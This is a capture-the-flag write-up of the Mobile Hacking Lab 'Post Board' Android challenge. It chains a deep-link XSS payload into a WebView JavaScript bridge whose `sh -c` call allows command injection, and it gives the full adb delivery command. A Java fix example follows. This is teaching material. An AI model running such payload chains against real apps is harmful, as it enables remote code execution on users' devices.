Post Board

Hello everyone! In this blog post I will try to explain my solution steps for the Post Board challenge from the Mobile Hacking Lab platform. I hope it will be useful for you.

  1. After we install the APK and open it, we see a messaging application with a single input field.
  2. Let's examine the AndroidManifest.xml. We find that the activity com.mobilehackinglab.postboard.MainActivity is exported.

    1. It has an intent filter with a data scheme of `postboard` and android:host of `postmessage`, with the category BROWSABLE.

  3. Let's analyse the code of this main activity:

    1. The first thing we find is setupView(), which:

      1. calls setJavaScriptEnabled(**true**)

      2. loads the URL file:///android_asset/index.html into the WebView

    2. The second thing is handleIntent(), which:

      1. verifies that the intent's URI scheme is `postboard` and the host is `postmessage`.

      2. decodes a Base64-encoded path from the URI, escapes certain characters, and passes the result to JavaScript via WebAppInterface.postMarkdownMessage to display it on the home page.

  4. Let's test our input:

    1. The first payload is `<h1>kero</h1>` ⇒ it renders as HTML, so the escaping does not stop markup.

    2. The second payload is `<img src=x onerror=alert(1)>` ⇒ success, we have XSS inside the WebView.

  5. When we analyse the WebAppInterface class we find the function postCowsayMessage():

    1. It executes the cowsay script located at CowsayUtil.scriptPath.

    2. It passes the message argument as `{"bin/sh", "-c", CowsayUtil.scriptPath + ' ' + message}`.

      1. It uses a shell, and the message is simply concatenated onto the script path, so the shell interprets whatever the message contains.

      2. Maybe we can call postCowsayMessage and pass `whoami` as the cowsayMessage.

      3. It is then passed to runCowsay and executed by the shell.

        1. My payload is `<img src=x onerror=WebAppInterface.postCowsayMessage("Kero0x1_is_here;id")>`; let's Base64-encode it and deliver it with adb:

      ```sh
      adb shell am start -n "com.mobilehackinglab.postboard/.MainActivity" -a "android.intent.action.VIEW" -d "postboard://postmessage/PGltZyBzcmM9eCBvbmVycm9yPVdlYkFwcEludGVyZmFjZS5wb3N0Q293c2F5TWVzc2FnZSgiS2VybzB4MV9pc19oZXJlO2lkIik+"
      ```

  6. And here we succeed and get RCE 😉
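For the fixing side, here is an added Java example (my own illustration, not the challenge app's code) that puts the `sh -c` string-concatenation pattern described in step 5 next to an argv-based version: the script path and the message are separate array elements, so no shell ever parses the message and `;id` is just text that cowsay prints. The class and method names are mine; `scriptPath` stands in for CowsayUtil.scriptPath.

```java
import java.io.BufferedReader;
import java.io.IOException;
import java.io.InputStreamReader;
import java.util.stream.Collectors;

public final class CowsayRunner {
    private final String scriptPath; // stands in for CowsayUtil.scriptPath

    public CowsayRunner(String scriptPath) {
        this.scriptPath = scriptPath;
    }

    // The pattern from the writeup: the message is spliced into a shell
    // command line, so a message like "hello;id" runs "id" as a second command.
    public String runCowsayUnsafe(String message) throws IOException {
        String[] cmd = {"/bin/sh", "-c", scriptPath + ' ' + message};
        return readAll(new ProcessBuilder(cmd));
    }

    // Hardened version: no shell at all. The script receives the message as
    // argv[1] exactly as typed; ';', '$(...)', backticks and quotes carry no
    // meaning because nothing tokenises the string as a command line.
    public String runCowsaySafe(String message) throws IOException {
        if (message == null || message.isEmpty() || message.length() > 200) {
            throw new IllegalArgumentException("invalid cowsay message");
        }
        String[] cmd = {scriptPath, message};
        return readAll(new ProcessBuilder(cmd));
    }

    // Collects stdout and stderr of the child process into one string.
    private static String readAll(ProcessBuilder pb) throws IOException {
        pb.redirectErrorStream(true);
        Process p = pb.start();
        try (BufferedReader r = new BufferedReader(
                new InputStreamReader(p.getInputStream()))) {
            return r.lines().collect(Collectors.joining("\n"));
        }
    }
}
```

Removing the shell only closes the command-injection half of the chain; the injected HTML still reaches the WebView, so the markdown path needs proper HTML escaping as well, and `@JavascriptInterface` methods should only be exposed to content the app itself controls.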
